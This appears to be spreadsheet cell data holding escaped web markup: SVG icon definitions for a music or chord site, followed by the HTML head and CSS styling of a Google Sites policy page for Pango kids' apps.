&lt;line id="sunray" x1="-25" y1="0" x2="15" y2="0" stroke-linecap="round" stroke-width="60" /&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;use transform="translate(60,300)" href="#sunray" /&gt;_x005F_x000D_
&lt;use transform="translate(540,300) rotate(180)" href="#sunray" /&gt;_x005F_x000D_
&lt;use transform="translate(300,60) rotate(90)" href="#sunray" /&gt;_x005F_x000D_
&lt;use transform="translate(300,540) rotate(270)" href="#sunray" /&gt;_x005F_x000D_
&lt;use transform="translate(130,130) rotate(45)" href="#sunray" /&gt;_x005F_x000D_
&lt;use transform="translate(470,130) rotate(135)" href="#sunray" /&gt;_x005F_x000D_
&lt;use transform="translate(470,470) rotate(225)" href="#sunray" /&gt;_x005F_x000D_
&lt;use transform="translate(130,470) rotate(315)" href="#sunray" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svglupe" viewBox="0 10 200 210" height="20" width="20"&gt;_x005F_x000D_
&lt;path d="M 150,160 L 175,185" fill="none" stroke-width="26" stroke-linecap="round"/&gt;_x005F_x000D_
&lt;circle cx="90" cy="100" r="62" stroke-width="14" fill="none" /&gt;_x005F_x000D_
&lt;path d="M 70,70 C 52,85, 52,115 70,130" fill="none" stroke-width="10" stroke-linecap="round"/&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svginv" viewBox="0 10 400 400" height="20" width="20"&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;g stroke-width="20"&gt;_x005F_x000D_
&lt;circle class="fbdot" cx="200" cy="60" r="40" /&gt;_x005F_x000D_
&lt;rect class="fbsquare" x="160" y="160" width="80" height="80" rx="9" ry="9" /&gt;_x005F_x000D_
&lt;circle class="fbdot" cx="200" cy="340" r="40" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;g stroke-width="20" fill="none" stroke-linecap="round"&gt;_x005F_x000D_
&lt;path d="M 290,200 C 405,190 405,360 290,338" /&gt;_x005F_x000D_
&lt;path d="M 310,310 L 280,340 310,370" transform="rotate(-5,280,340)" /&gt;_x005F_x000D_
&lt;path d="M 110,200 C -5,210 -5,40 110,62" /&gt;_x005F_x000D_
&lt;path d="M 90,90 L 120,60 90,30" transform="rotate(-5,120,60)" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgslash" viewBox="0 0 400 400" height="20" width="20"&gt;_x005F_x000D_
&lt;g id="svgslashxyz" transform="scale(0.5)" stroke-linecap="round"  stroke-linejoin="round" fill="none"&gt;_x005F_x000D_
&lt;path d="M 20,110 L 170,290 M 20,290 L 170,110" stroke-width="38"  /&gt; _x005F_x000D_
&lt;path d="M 220,220 L 280,300 M 340,220 L 240,380" stroke-width="25"  /&gt;_x005F_x000D_
&lt;path d="M 340,50 L 420,50 350,155 430,155" stroke-width="25"  /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;path d="M 110,310 L 290,100" stroke-width="40" fill="none" stroke-linecap="round"  /&gt;_x005F_x000D_
&lt;g stroke-width="15" stroke="none" stroke-linecap="round" stroke-linejoin="round"&gt;_x005F_x000D_
&lt;path d="M 290,270 C 280,260 275,265 265,265 C 250,260 270,215 300,220 C 345,225 340,330 260,390_x005F_x000D_
C 390,320 375,200 300,200 C 245,200 240,260 250,280 C 260,300 300,300 290,270" /&gt;_x005F_x000D_
&lt;circle cx="384" cy="235" r="14" /&gt;_x005F_x000D_
&lt;circle cx="384" cy="290" r="14" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svguni" viewBox="0 0 200 200"&gt;_x005F_x000D_
&lt;g stroke-width="13" fill="none"  stroke-linejoin="round" &gt;_x005F_x000D_
&lt;path d="M6,60 L 101,18 188,60 98,115 Z" /&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;path d="M38,80 L 38,140 C 68,170 128,170 158,140 L158,80" /&gt;_x005F_x000D_
&lt;path d="M190,60 L190,150 L185,170 195,170 190,150" stroke-width="8" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;circle cx="190" cy="140" r="5" stroke-width="10"  /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
_x005F_x000D_
&lt;svg id="svgenh"  viewBox="0 0 200 200" height="20" width="20"&gt;_x005F_x000D_
&lt;symbol id="svgarrsharp" viewBox="0 0 200 200"&gt;_x005F_x000D_
&lt;g stroke-width="10" stroke-linecap="round" fill="none"&gt;_x005F_x000D_
&lt;path d="M 75 110 L 135 110" stroke-width="10" fill="none" /&gt;_x005F_x000D_
&lt;path d="M 95 90 L 75 110 L 95 130" stroke-width="12" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="svgarrflat" viewBox="0 0 200 200"&gt;_x005F_x000D_
&lt;g stroke-width="10" stroke-linecap="round" fill="none"&gt;_x005F_x000D_
&lt;path d="M 75 110 L 135 110" stroke-width="10" fill="none" /&gt;_x005F_x000D_
&lt;path d="M 115 90 L 135 110 L 115 130" stroke-width="12" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="svgsharp" viewBox="0 0 200 200"&gt;_x005F_x000D_
&lt;g fill="none"&gt;_x005F_x000D_
&lt;path d="M 20 70 L 20 150" stroke-width="8" stroke-linecap="round"/&gt;_x005F_x000D_
 &lt;path d="M 37 65 L 37 145" stroke-width="8" stroke-linecap="round"/&gt;_x005F_x000D_
&lt;path d="M 5 100 L 53 90" stroke-width="11" stroke-linecap="none"/&gt;_x005F_x000D_
&lt;path d="M 5 130 L 53 120" stroke-width="11" stroke-linecap="none"/&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="svgflat" viewBox="0 0 200 200"&gt;_x005F_x000D_
&lt;g stroke-width="9" stroke-linecap="round" fill="none"&gt;_x005F_x000D_
&lt;path d="M 165 65 L 165 145" /&gt;_x005F_x000D_
&lt;path d="M 165 145 C 170 140, 190 130, 190 115 C 192 103, 185 90, 165 110 " /&gt;_x005F_x000D_
&lt;/g&gt; _x005F_x000D_
&lt;/symbol&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgnote" viewBox="-5 -5 45 70"&gt;_x005F_x000D_
&lt;g&gt;_x005F_x000D_
&lt;path d="M 27 50 V 5" stroke-width="3" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;ellipse transform="rotate(-25,17,55)" stroke="none" cx="17" cy="55" rx="12" ry="7" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgsyntaxOLD" viewBox="-80 -20</t>
  </si>
  <si>
    <t>550 650"&gt;_x005F_x000D_
&lt;path d="M365 117l-23 40-99-59 24-39c4-8 16-11 24-6l68 40c8 5 11 16 6 24zM106 409l-34-20 151-256 34 21zm-43 22l74 44-76 44zM380 58l-69-41c-13-7-57-18-79 21L26 385c-2 3-3 7-3 10l-3 159c0 8 3 14 10 18 6 4 16 2 20 0l138-79 7-8 205-347c17-28 8-63-20-80z"/&gt; &lt;path d="M40 580 H500" stroke-width="40" stroke-linecap="round" stroke-dasharray="180,80,30,80,30,500" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgsyntax" viewBox="0 0 200 200"&gt;_x005F_x000D_
&lt;g transform="rotate(-5),translate(0,5)"&gt;_x005F_x000D_
&lt;circle cx="51" cy="159" r="10" stroke-width="0" /&gt;_x005F_x000D_
&lt;g stroke-width="10" stroke-linejoin="round" fill="none"&gt;_x005F_x000D_
&lt;path d="M40 170 L 60,130 150,40 C 160,30 180,50 170,60 L 80,150 Z" /&gt;_x005F_x000D_
&lt;path d="M62,128 L 82,148 M 145,45 L 165,65" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;path d="M70,140 L 155,55" stroke-width="9" fill="none" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;path d="M55,190 H 175" stroke-width="7" stroke-linecap="round" fill="none" stroke-dasharray="25,15,20,15,15,15,20,10" &gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgfavs" viewBox="0 0 238.2 238.2"&gt;_x005F_x000D_
&lt;path d="M70 43.2v-20a7.8 7.8 0 0 1-2.7-6 7.8 7.8 0 1 1 15.7 0c0 2.4-1 4.5-2.8 6v20zm27.8 0v-20a7.8 7.8 0 0 1-2.8-6 7.8 7.8 0 1 1 15.7 0c0 2.4-1 4.5-2.8 6v20zm27.7 0v-20a7.8 7.8 0 0</t>
  </si>
  <si>
    <t>1-2.8-6c0-4.3 3.5-7.8 7.9-7.8 4.3 0 7.8 3.5 7.8 7.8 0 2.4-1 4.5-2.8 6v20zm27.7 0v-20a7.8 7.8 0 0 1-2.8-6c0-4.3 3.5-7.8 7.9-7.8 4.3 0 7.8 3.5 7.8 7.8 0 2.4-1 4.5-2.7 6v20zm13.4 150v20a7.8 7.8 0 0 1 2.8 6 7.8 7.8 0 1 1-15.7 0c0-2.4 1-4.6 2.8-6v-20zm-27.7 0v20a7.8 7.8 0 0 1 2.8 6 7.8 7.8 0 1 1-15.7 0c0-2.4 1-4.6 2.8-6v-20zm-27.7 0v20a7.8 7.8 0 0 1 2.8 6c0 4.3-3.5 7.8-7.9 7.8a7.8 7.8 0 0 1-7.8-7.8c0-2.4 1-4.6 2.8-6v-20zm-27.7 0v20a7.8 7.8 0 0 1 2.8 6c0 4.3-3.5 7.8-7.9 7.8a7.8 7.8 0 0 1-7.8-7.8c0-2.4 1-4.6 2.8-6v-20zM196 71.4h20.2a7.9 7.9 0 0 1 13.8 5 7.8 7.8 0 0 1-13.8 5H196zm34 32.5a7.8 7.8 0 0 1-13.8 5H196V99h20.2a7.9 7.9 0 0 1 13.8 5zm0 27.6a7.8 7.8 0 0 1-13.8 5H196v-10h20.2a7.9 7.9 0 0 1 13.8</t>
  </si>
  <si>
    <t>5zM216.2 164H196v-10h20.2a7.9 7.9 0 0 1 13.8 5 7.8 7.8 0 0 1-13.8 5zM10 159a7.8 7.8 0 0 1 13.8-5H44v10H23.8a7.9 7.9 0 0 1-13.8-5zm0-27.5a7.8 7.8 0 0 1 13.8-5H44v10H23.8a7.9 7.9 0 0 1-13.8-5zm0-27.6a7.8 7.8 0 0 1 13.8-5H44v10H23.8a7.9 7.9 0 0</t>
  </si>
  <si>
    <t>1-13.8-5zm0-27.5a7.8 7.8 0 0 1 13.8-5H44v10H23.8a7.9 7.9 0 0 1-13.8-5z"/&gt;_x005F_x000D_
&lt;rect ry="16.4" y="58.2" x="55" height="125" width="130" /&gt;_x005F_x000D_
 &lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgfavssave" viewBox="0 0 100 100"&gt;_x005F_x000D_
&lt;g fill="none" stroke-width="8" stroke-linecap="round"&gt;_x005F_x000D_
&lt;path d="M10 70 V90 H90 V70"/&gt;_x005F_x000D_
&lt;path d="M50 10 V65 M30 50 L50 70 L70 50"/&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt; _x005F_x000D_
&lt;svg id="svgfavscompare" viewBox="-15 -15</t>
  </si>
  <si>
    <t>230 230"&gt;_x005F_x000D_
&lt;g fill="none" stroke-width="12" stroke-linecap="round"&gt;_x005F_x000D_
&lt;path d="M23 113c-7-15-7.8-23.3-1.6-28.2 6.5-4.1 13.8-1.1 19.6 3.8A55 55 0 0 1 58 116c3 11 1-92 1-92v-3c0-11 9-14 14-14 6 0 14 3 14 14l2 80h4.3l-.2-32c0-8.3 3.7-13 10.7-13 7 0 14.2 2.7 14.2 13.7V101h4.7V79c0-6 3.3-13 12.3-12 9 0 13 8 13 13v29h4V97c0-10 3-15 11-15 7.7 0 13.3 6.3 13.3 18v46c.3 23.4-11.3 47-42.3 47H86c-11 1-25.8-6.6-34-20.8-6.6-11.5-29-59.2-29-59.2z" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgtrash" viewBox="0 0 483 483"&gt;_x005F_x000D_
&lt;g stroke-width="0"&gt;_x005F_x000D_
&lt;path d="M381.2 57.8H306a65.4 65.4 0 0 0-129.7 0h-75.1a55.2 55.2 0 0 0-55.1 55.1v2.8A55.2 55.2 0 0 0 81 167v260.4a55.2 55.2 0 0 0 55.1 55.1h210.2a55.2 55.2 0 0 0 55.1-55V166.8a55.2 55.2 0 0 0</t>
  </si>
  <si>
    <t>34.9-51.2V113a55.2 55.2 0 0 0-55.1-55.1zm-140-31.7c19 0 35 13.7 38.5 31.7h-77a39.2 39.2 0 0 1 38.5-31.7zm134.1 401.2c0 16-13 29-29 29H136.1c-16 0-29-13-29-29V171h268.2v256.4zm34.8-311.6c0 16-13 29-29 29H101.4c-16 0-29-13-29-29V113c0-16 13-29 29-29h279.9c16 0 29 13 29 29v2.8z"/&gt;_x005F_x000D_
&lt;path d="M171.1 422.9a13 13 0 0 0 13.1-13.1V262.6a13 13 0 0 0-26.1 0v147.2a13 13 0 0 0 13 13zM241.2 422.9a13 13 0 0 0 13-13.1V262.6a13 13 0 0 0-26 0v147.2a13 13 0 0 0 13 13zM311.3 422.9a13 13 0 0 0</t>
  </si>
  <si>
    <t>13-13.1V262.6a13 13 0 0 0-26 0v147.2a13 13 0 0 0 13 13z"/&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
 &lt;svg id="svgclear" viewBox="0 0 40 40" height="20" width="20"&gt;_x005F_x000D_
&lt;path d="M35 27c-2 4-6 9-15 9S4 29 4 20 11 4 20 4s15 10 15 10M27</t>
  </si>
  <si>
    <t xml:space="preserve">15h10M37 5v10" transform="scale(-1,1),translate(-40,0)" fill="none" stroke-width="4" stroke-linecap="round" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgthumbs" viewBox="0 0 200 200" height="20" width="20"&gt;_x005F_x000D_
&lt;g id="chfb" transform="translate(0,10)" style="opacity:0.5"&gt;_x005F_x000D_
&lt;path id="chsaite" stroke-width="4" stroke-linecap="round" d="M 10 10 H 190 M 10 25 H 190 M 10 40 H 190 M 10 55 H 190" /&gt;_x005F_x000D_
&lt;use href="#chsaite" /&gt;_x005F_x000D_
&lt;path id="chfret" stroke-width="5" stroke-linecap="round" d="M 10 11 V 53 M 34 11 V 53 M 58 11 V 53 M 82 11 V 53 M 106 11 V 53 M 135 11 V 53 M 162 11 V 53 M 189 11 V 53" /&gt;_x005F_x000D_
 &lt;use href="#chfret" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;symbol id="chtn"&gt;_x005F_x000D_
&lt;path stroke-width="3" stroke-linecap="round" d="M 10 10 H 60 M 10 20 H 60 M 10 30 H 60 M 10 40 H 60" /&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;path stroke-width="3" stroke-linecap="round" d="M 10 10 V 40 M 23 10 V 40 M 35 10 V 40 M 47 10 V 40 M 60 10 V 40" /&gt;_x005F_x000D_
 &lt;/symbol&gt;_x005F_x000D_
 &lt;use transform="translate(0,80)" href="#chtn"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use transform="translate(65,80)" href="#chtn" /&gt;_x005F_x000D_
&lt;use transform="translate(130,80)" href="#chtn" /&gt;_x005F_x000D_
&lt;use transform="translate(0,135)" href="#chtn"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use transform="translate(65,135)" href="#chtn" /&gt;_x005F_x000D_
&lt;use transform="translate(130,135)" href="#chtn" /&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgarp" viewBox="0 -15 75</t>
  </si>
  <si>
    <t xml:space="preserve">90"&gt;_x005F_x000D_
&lt;path d="M64.7 32.7c-2-2.3-2.7-5.4-6-5.4-3.6 0-4.3 3.2-6.4 5.6-1.7 2-5.2 2.6-5.2 6 0 4.5 5.1 7.1 11.5 7.1s11.6-2.6 11.6-7c0-3.8-3.6-4.3-5.5-6.3zM50.1 28.5c0-2.2-7-10-7-10s-1.2 7.8-1.2 10a4 4 0 0 0 8.2 0zM73.5 18.4s-7.1 7.9-7.1 10.1a4 4 0 0 0 8.2 0c0-2.2-1.1-10-1.1-10zM53.2 24a4 4 0 0 0 4-4c0-2.3-4-10.1-4-10.1s-4.1 7.8-4.1 10a4 4 0 0 0 4 4.1zM63.3 24a4 4 0 0 0 4-4c0-2.3-4-10.1-4-10.1s-4 7.8-4 10a4 4 0 0 0 4 4.1zM22.2 51.6c-2-2.5-2.7-5.6-6.3-5.6-3.4 0-4 3-6 5.4-2 2-5.5 2.4-5.5 6.2 0 4.5 5.1 7.1 11.5 7.1s11.6-2.6 11.6-7.1c0-3.4-3.6-4-5.3-6zM24.4 47.2a4 4 0 0 0 8.2 0c0-2.2-1-10-1-10s-7.2 7.8-7.2 10zM8.2 47.2c0-2.2-7.1-10-7.1-10S0 45 0 47.1a4 4 0 0 0 8.2 0zM21.4 42.7a4 4 0 0 0 4-4c0-2.3-4-10.2-4-10.2s-4 7.9-4 10.1a4 4 0 0 0 4 4.1zM11.2 42.7a4 4 0 0 0 4.1-4c0-2.3-4-10.2-4-10.2s-4.1 7.9-4.1 10.1a4 4 0 0 0 4 4.1z"/&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;svg id="svgdescOLD" viewBox="0 0 200 200" height="20" width="20"&gt;_x005F_x000D_
&lt;g stroke-width="12" stroke-linecap="round"&gt;_x005F_x000D_
&lt;path d="M 40 40 H 60 M 80 40 H 130 M 150 40 H 160" /&gt;_x005F_x000D_
 &lt;path d="M 40 80 H 80 M 100 80 H 120 M 140 80 H 160" /&gt;_x005F_x000D_
&lt;path d="M 40 120 H 50 M 70 120 H 90 M 110 120 H 160" /&gt;_x005F_x000D_
&lt;path d="M 40 160 H 70 M 90 160 H 110 M 130 160 H 160" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;svg id="svgdesc" viewBox="0 0 100 100"&gt;_x005F_x000D_
&lt;g stroke-width="5" stroke-linecap="round" fill="none" &gt;_x005F_x000D_
&lt;rect x="10" y="8" width="80" height="20" rx="4" ry="4" stroke="#69A" /&gt;_x005F_x000D_
 &lt;rect x="10" y="40" width="80" height="20" rx="4" ry="4" stroke="#D90" /&gt;_x005F_x000D_
&lt;rect x="10" y="72" width="80" height="20" rx="4" ry="4" stroke="#8A0" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;/svg&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>&lt;svg id="svgchords" viewBox="0 0 150 200"&gt;_x005F_x000D_
&lt;g id="chfb"&gt;_x005F_x000D_
&lt;path id="chsaite" stroke-width="4" stroke-linecap="round" d="M 10 10 V 190 M 20 10 V 190 M 30 10 V 190" /&gt;_x005F_x000D_
&lt;use transform="translate(30,0)" xlink:href="#chsaite" /&gt;_x005F_x000D_
&lt;path id="chfret" stroke-width="5" stroke-linecap="round" d="M 10 10 H 60 M 10 30 H 60 M 10 50 H 60 M 10 70 H 60 M 10 90 H 60 M 10 110 H 60" /&gt;_x005F_x000D_
&lt;use transform="translate(0,120)" xlink:href="#chfret" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;g id="chtn"&gt;_x005F_x000D_
&lt;path transform="translate(80,9)" stroke-width="3" stroke-linecap="round" d="M 0 0 V 50 M 10 0 V 50 M 20 0 V 50 M 30 0 V 50" /&gt;_x005F_x000D_
&lt;path transform="translate(80,9)" stroke-width="3" stroke-linecap="round" d="M 0 0</t>
  </si>
  <si>
    <t>H 30 M 0 13 H 30 M 0 25 H 30 M 0 37 H 30 M 0</t>
  </si>
  <si>
    <t>50 H 30" /&gt;_x005F_x000D_
&lt;/g&gt;_x005F_x000D_
&lt;use transform="translate(0,66)" xlink:href="#chtn" /&gt;_x005F_x000D_
&lt;use transform="translate(0,133)" xlink:href="#chtn" /&gt;_x005F_x000D_
&lt;circle id="chb" transform="translate(128,5)" fill="#774" cx="15" cy="15" r="9" /&gt;_x005F_x000D_
&lt;use transform="translate(0,50)" xlink:href="#chb" /&gt;_x005F_x000D_
&lt;use transform="translate(0,105)" xlink:href="#chb" /&gt;_x005F_x000D_
&lt;use transform="translate(0,160)" xlink:href="#chb" /&gt;_x005F_x000D_
&lt;/svg&gt; --&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;svg id="svgchords" viewBox="0 0 300 300" height="20" width="20"&gt;_x005F_x000D_
&lt;symbol id="vchordssaite"&gt;&lt;line x1="15" y1="0" x2="285" y2="0"  /&gt;&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="vchordsbund"&gt;&lt;line x1="0" y1="25" x2="0" y2="282" /&gt;&lt;/symbol&gt;_x005F_x000D_
&lt;g stroke-width="15" stroke="#887" fill="none" &gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,25)" /&gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,75)" /&gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,125)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,175)" /&gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,225)" /&gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,275)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#vchordsbund" transform="translate(15,0)" /&gt;_x005F_x000D_
&lt;use href="#vchordsbund" transform="translate(105,0)" /&gt;_x005F_x000D_
&lt;use href="#vchordsbund" transform="translate(195,0)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#vchordsbund" transform="translate(285,0)" /&gt;_x005F_x000D_
&lt;rect class="fbsquare" x="129" y="57" width="46" height="46" rx="7" ry="7" stroke-width="9" /&gt;_x005F_x000D_
&lt;circle class="fbdot" cx="60" cy="125" r="25" stroke-width="8" /&gt;_x005F_x000D_
&lt;circle class="fbdot" cx="240" cy="175" r="25" stroke-width="8" /&gt;_x005F_x000D_
&lt;circle class="fbdot" cx="150" cy="225" r="25" stroke-width="8" /&gt; _x005F_x000D_
&lt;!-- _x005F_x000D_
&lt;symbol id="vchordssaite"&gt;&lt;line x1="15" y1="0" x2="285" y2="0"  /&gt;&lt;/symbol&gt;_x005F_x000D_
&lt;symbol id="vchordsbund"&gt;&lt;line x1="0" y1="36" x2="0" y2="270" /&gt;&lt;/symbol&gt;_x005F_x000D_
&lt;g stroke-width="14" stroke="#887" fill="none" &gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,36)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,112)" /&gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,188)" /&gt;_x005F_x000D_
&lt;use href="#vchordssaite" transform="translate(0,264)"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;use href="#vchordsbund" tr</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="Ykbter4MwCiobFBvpmyl0w"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="Ykbter4MwCiobFBvpmyl0w"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="Ykbter4MwCiobFBvpmyl0w"&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1Uu_OuUcccHpO2MULHPrMKVnYashjRRdNTeTsiUwl4RElnoJVMWVbQG4cHH0J28J6Gl4Eu","je":1,"sstu":1681340315862933,"si":"CJmPmOK4pf4CFbnGSgAdAYsFFg","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747265,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49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50224286,50263472,50291080,50313182,50322323,50347762,50455861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 css?family=Roboto%3A300%2C400%2C500%2C700%7COpen%20Sans%3A400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="prUrh7vVc9unLTebLY9RmQ"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="prUrh7vVc9unLTebLY9RmQ"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Comfortaa%3Ai%2Cbi%2C700%2C300%2C400%2C500&amp;display=swap" rel="stylesheet" nonce="prUrh7vVc9unLTebLY9RmQ"&gt;&lt;style nonce="prUrh7vVc9unLTebLY9RmQ"&gt;@media only screen and (max-width: 479px){.Rn3Z1b{font-size: 23.0pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Rn3Z1b{font-size: 27.0pt;}}@media only screen and (min-width: 768px) and (max-width: 1279px){.Rn3Z1b{font-size: 30.0pt;}}@media only screen and (min-width: 1280px){.Rn3Z1b{font-size: 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nonce="prUrh7vVc9unLTebLY9RmQ"&gt;&lt;script nonce="Ykbter4MwCiobFBvpmyl0w"&gt;&lt;/script&gt;&lt;title&gt;Pango - apps &amp;amp; games for kids - Policy&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="prUrh7vVc9unLTebLY9RmQ"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color: rgba(0,0,0,1);}.JYVBee .OUGEr{color: rgba(0,0,0,1);}.OmQG5e .OUGEr{color: rgba(0,0,0,1);}.iwQgFb{background-color: rgba(211,211,211,1);}.ySLm4c{font-family: 'Open Sans', sans-serif;}.CbiMKe{background-color: rgba(251,208,5,1);}.qeLZfd .zfr3Q{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color: rgba(0,0,0,1);}.qeLZfd .qLrapd{color: rgba(0,0,0,1);}.qeLZfd .JYVBee{color: rgba(0,0,0,1);}.qeLZfd</t>
  </si>
  <si>
    <t>.aHM7ed{color: rgba(0,0,0,1);}.qeLZfd .OmQG5e{color: rgba(0,0,0,1);}.qeLZfd .NHD4Gf{color: rgba(0,0,0,1);}.qeLZfd .aw5Odc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.qeLZfd .dhtgD:hover{color: rgba(0,0,0,1);}.qeLZfd .dhtgD:visited{color: rgba(0,0,0,1);}.qeLZfd .iwQgFb{background-color: rgba(211,206,190,1);}.qeLZfd .OUGEr{color: rgba(33,33,33,1);}.qeLZfd .duRjpb .OUGEr{color</t>
  </si>
  <si>
    <t>: rgba(0,0,0,1);}.qeLZfd .JYVBee .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.qeLZfd .OmQG5e .OUGEr{color: rgba(0,0,0,1);}.qeLZfd:before{background-color: rgba(255,250,230,1); display: block;}.lQAHbd .zfr3Q{color: rgba(0,0,0,1);}.lQAHbd .qnVSj{color: rgba(0,0,0,1);}.lQAHbd .Glwbz{color: rgba(0,0,0,1);}.lQAHbd .duRjpb{color: rgba(0,0,0,1);}.lQAHbd .qLrapd{color: rgba(0,0,0,1);}.lQAHbd .JYVBee{color: rgba(0,0,0,1);}.lQAHbd .aHM7ed{color: rgba(0,0,0,1);}.lQAHbd .OmQG5e{color: rgba(0,0,0,1);}.lQAHbd .NHD4Gf{color: rgba(0,0,0,1);}.lQAHbd .aw5Odc{color: rgba(0,0,0,1);}.lQAHbd .dhtgD:hover{color: rgba(0,0,0,1);}.lQAHbd .dhtgD:visited{color: rgba(0,0,0,1);}.lQAHbd .iwQgFb{background-color: rgba(201,172,34,1);}.lQAHbd .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .duRjpb .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .JYVBee .OUGEr{color: rgba(0,0,0,1);}.lQAHbd .OmQG5e .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}.lQAHbd:before{background-color: rgba(251,208,5,1); display: block;}.cJgDec .zfr3Q{color: rgba(255,255,255,1);}.cJgDec .zfr3Q .OUGEr{color : rgba(255,255,255,1);}.cJgDec .qnVSj{color: rgba(255,255,255,1);}.cJgDec .Glwbz{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .qLrapd{color: rgba(255,255,255,1);}.cJgDec .aHM7ed{color: rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0; display: block;}.O13XJf{height: 310px; padding-bottom: 50px; padding-top: 50px;}.O13XJf .IFuOkc{background-image: url(https://ssl.gstatic.com/atari/images/aristotle-header-dark.jpg);}.O13XJf .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.5; display: block;}.O13XJf .zfr3Q{color:</t>
  </si>
